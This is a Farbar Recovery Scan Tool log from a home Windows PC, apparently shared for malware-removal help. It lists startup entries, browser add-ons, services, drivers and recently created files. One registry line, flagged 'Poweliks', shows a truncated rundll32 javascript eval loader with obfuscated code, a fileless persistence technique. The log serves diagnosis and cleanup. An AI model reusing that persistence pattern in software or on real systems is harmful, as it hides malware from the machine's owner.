(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Daemon for Mouse Suite] => C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.EXE [99840 2010-07-29] (Primax Electronics Ltd.)
HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2013-04-30] (LogMeIn, Inc.)
HKLM-x32\...\Run: [Power Manager Power Agenda] => C:\Program Files (x86)\ThinkPad\Utilities\DPMHost.EXE [75064 2010-07-28] ()
HKLM-x32\...\Run: [Lenovo Registration] => C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe [4351712 2011-07-13] (Lenovo, Inc.)
HKLM-x32\...\Run: [D-Link D-Link DWA-125] => C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe [1024000 2010-05-21] (D-Link Corp.)
HKLM-x32\...\Run: [WZCSLDR2] => C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe [122880 2010-04-21] (Wireless Service)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Display] => C:\Program Files (x86)\APC\PowerChute Personal Edition\DataCollectionLauncher.exe [284024 2012-01-24] (Schneider Electric)
HKLM-x32\...\Run: [EaseUs Watch] => C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe [70792 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [EaseUs Tray] => C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe [743560 2011-12-26] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3593744 2014-09-05] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG Secure Search\vprot.exe [2640408 2014-08-26] ()
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1279120 2012-09-27] (CANON INC.)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [452272 2012-08-31] (CANON INC.)
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_winlogonx64.dll (Citrix Online, LLC)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-13] (Microsoft Corporation)
HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-606911418-3109034106-3922174115-1001\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-606911418-3109034106-3922174115-500\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
IFEO\ehshell.exe: [Debugger] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\APC UPS Status.lnk
ShortcutTarget: APC UPS Status.lnk -> C:\Program Files (x86)\APC\PowerChute Personal Edition\Display.exe (Schneider Electric)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/webhp?rls=ig
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexbho.dll (CANON INC.)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files (x86)\AVG\AVG2012\avgssiea.dll No File
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll No File
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO-x32: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files (x86)\AVG\AVG2012\avgssie.dll No File
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: No Name -> {95B7759C-8C7F-4BF1-B163-73684A933233} ->  No File
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexhlp.dll (CANON INC.)
Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} -  No File
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll No File
Toolbar: HKCU - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexhlp.dll (CANON INC.)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgppa.dll No File
Handler-x32: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgpp.dll No File
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll (AVG Secure Search)
Tcpip\..\Interfaces\{145F6C64-D76C-4A66-8658-02D842AE2435}: [NameServer] 8.8.8.8,8.8.4.4

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.9\\npsitesafety.dll No File
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll (CANON INC.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [ndibdjnfmopecpmkdieinmbadjfpblof] - C:\ProgramData\AVG Secure Search\ChromeExt\18.1.0.443\avg.crx [2014-04-17]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 APC Data Service; C:\Program Files (x86)\APC\PowerChute Personal Edition\dataserv.exe [21880 2012-01-24] (Schneider Electric)
R2 APC UPS Service; C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe [705912 2012-01-24] (Schneider Electric)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3364368 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [293448 2014-09-05] (AVG Technologies CZ, s.r.o.)
S2 D_Link_DWA-125; C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWZCSdS.exe [126976 2010-04-21] (Wireless Service) [File not signed]
S2 D_Link_DWA-125_WPS; C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe [53248 2010-03-03] () [File not signed]
R2 EaseUS Agent; C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe [61064 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 GoToAssist Remote Support Customer; C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_service.exe [610888 2014-09-25] (Citrix Online, LLC)
R2 Guard Agent; C:\Program Files (x86)\EaseUS\Todo Backup\bin\GuardAgent.exe [23176 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [376144 2014-07-19] (LogMeIn, Inc.)
R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [226640 2014-07-19] (LogMeIn, Inc.)
R2 LMS; C:\Program Files (x86)\Intel\AMT\LMS.exe [174616 2009-07-21] (Intel Corporation)
R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2013-04-30] (LogMeIn, Inc.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 PelService; C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe [177152 2010-04-22] () [File not signed]
R2 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [28672 2011-07-25] (Lenovo Group Limited) [File not signed]
R2 ThinkVantage Registry Monitor Service; C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe [1019904 2009-08-28] (Lenovo Group Limited) [File not signed]
S3 TVT Backup Service; C:\Program Files (x86)\Lenovo\Rescue and Recovery\rrservice.exe [1475896 2010-07-29] (Lenovo Group Limited)
R2 UNS; C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2066968 2009-07-21] (Intel Corporation)
R2 vToolbarUpdater18.1.9; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [1820184 2014-08-11] (AVG Secure Search)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 anodlwf; C:\Windows\System32\DRIVERS\anodlwfx.sys [15872 2009-03-06] ()
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [247576 2014-07-24] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [243480 2014-08-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [313624 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123672 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [270616 2014-07-02] (AVG Technologies CZ, s.r.o.)
R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-08-11] (AVG Technologies)
R0 EUBAKUP; C:\Windows\System32\drivers\eubakup.sys [57480 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R0 EUBKMON; C:\Windows\System32\drivers\EUBKMON.sys [51336 2011-12-22] () [File not signed]
R1 EUDSKACS; C:\Windows\system32\drivers\eudskacs.sys [19592 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R1 EUFDDISK; C:\Windows\system32\drivers\EuFdDisk.sys [189576 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-04-30] (LogMeIn, Inc.)
S4 LMIRfsClientNP; No ImagePath
R1 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [93400 2014-10-01] (Malwarebytes Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-02] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
S3 netr28ux; C:\Windows\System32\DRIVERS\Dnetr28ux.sys [1119072 2010-05-05] (Ralink Technology Corp.)
R3 pelmouse; C:\Windows\System32\DRIVERS\pelmouse.sys [23040 2010-10-20] (TPMX Electronics Ltd.)
R3 pelusblf; C:\Windows\System32\DRIVERS\pelusblf.sys [33280 2010-12-22] (TPMX Electronics Ltd.)
R1 Serial; C:\Windows\System32\DRIVERS\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
R3 TVTI2C; C:\Windows\System32\DRIVERS\Tvti2c.sys [41536 2009-07-02] (Lenovo (United States) Inc.)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-02 15:12 - 2014-11-02 15:12 - 00000000 ____D () C:\Users\Deborah\Downloads\FRST-OlderVersion
2014-10-31 06:49 - 2014-10-31 06:49 - 05591672 _____ (Swearware) C:\Users\Deborah\Downloads\ComboFix.exe
2014-10-31 06:33 - 2014-10-31 06:33 - 00018772 _____ () C:\Users\Deborah\Downloads\DDS.txt
2014-10-31 06:33 - 2014-10-31 06:33 - 00005354 _____ () C:\Users\Deborah\Downloads\Attach.txt
2014-10-31 06:32 - 2014-10-31 06:32 - 00018772 _____ () C:\Users\Deborah\Desktop\dds.txt
2014-10-31 06:32 - 2014-10-31 06:32 - 00005354 _____ () C:\Users\Deborah\Desktop\attach.txt
2014-10-31 06:18 - 2014-10-31 06:18 - 00688992 ____R (Swearware) C:\Users\Deborah\Downloads\dds.com
2014-10-31 05:55 - 2014-10-31 05:57 - 00026686 _____ () C:\Users\Deborah\Downloads\Addition.txt
2014-10-31 05:52 - 2014-11-02 15:15 - 00019716 _____ () C:\Users\Deborah\Downloads\FRST.txt
2014-10-31 05:50 - 2014-11-02 15:14 - 00000000 ____D () C:\FRST
2014-10-31 05:50 - 2014-11-02 15:12 - 02114560 _____ (Farbar) C:\Users\Deborah\Downloads\FRST64.exe
2014-10-31 05:27 - 2014-10-31 05:27 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-31 05:25 - 2014-10-31 05:25 - 29458856 _____ (Oracle Corporation) C:\Users\Deborah\Downloads\jre-7u71-windows-i586.com
2014-10-31 05:24 - 2014-10-31 05:24 - 29727656 _____ (Oracle Corporation) C:\Users\Deborah\Downloads\jre-8u25-windows-i586.com
2014-10-31 04:59 - 2014-10-31 04:59 - 00001880 _____ () C:\Windows\PFRO.log
2014-10-31 04:15 - 2010-08-30 07:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-10-31 04:12 - 2014-10-31 04:16 - 00000000 ____D () C:\AdwCleaner
2014-10-30 20:00 - 2014-10-30 20:00 - 01375089 _____ () C:\Users\Deborah\Downloads\adwcleaner_3.311.exe
2014-10-29 15:01 - 2014-10-31 05:31 - 00000168 _____ () C:\Windows\setupact.log
2014-10-29 15:01 - 2014-10-29 15:01 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-27 12:12 - 2014-10-27 12:12 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Deborah\Downloads\tdsskiller.exe
2014-10-24 11:34 - 2014-10-31 06:28 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-10-22 09:46 - 2014-10-22 09:46 - 00000028 _____ () C:\Windows\SysWOW64\u
2014-10-21 09:54 - 2014-10-21 09:54 - 00000000 ____D () C:\Users\Deborah\AppData\Roaming\AVG2015
2014-10-21 09:51 - 2014-10-21 09:53 - 00000000 ____D () C:\ProgramData\AVG2015
2014-10-21 09:51 - 2014-10-21 09:51 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Avg
2014-10-21 09:46 - 2014-10-21 09:59 - 00000000 ____D () C:\Users\Deborah\AppData\Local\Avg2015
2014-10-20 12:53 - 2014-10-20 12:53 - 00003856 _____ () C:\Windows\System32\Tasks\{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D}
2014-10-20 12:53 - 2014-10-20 12:53 - 00000000 _____ () C:\Windows\system32\qzmktxy.dll
2014-10-15 13:53 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 13:53 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 13:53 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 13:53 - 2014-08-18 22:11 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-15 13:53 - 2014-08-18 22:10 - 00616352 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-15 13:53 - 2014-08-18 22:08 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-15 13:53 - 2014-08-18 22:08 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 13:53 - 2014-08-18 22:08 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2014-10-15 13:53 - 2014-08-18 22:07 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 13:53 - 2014-08-18 22:07 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00032256 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 13:53 - 2014-08-18 21:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-15 13:53 - 2014-08-18 21:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2014-10-15 13:53 - 2014-08-18 21:06 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 13:53 - 2014-07-06 21:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 13:53 - 2014-07-06 21:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 13:53 - 2014-07-06 21:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 05551032 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 13:53 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 13:53 - 2014-07-06 21:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 13:53 - 2014-07-06 21:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 13:53 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 13:53 - 2014-07-06 20:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 13:53 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-15 13:53 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-15 13:53 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-15 13:53 - 2014-07-06 20:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
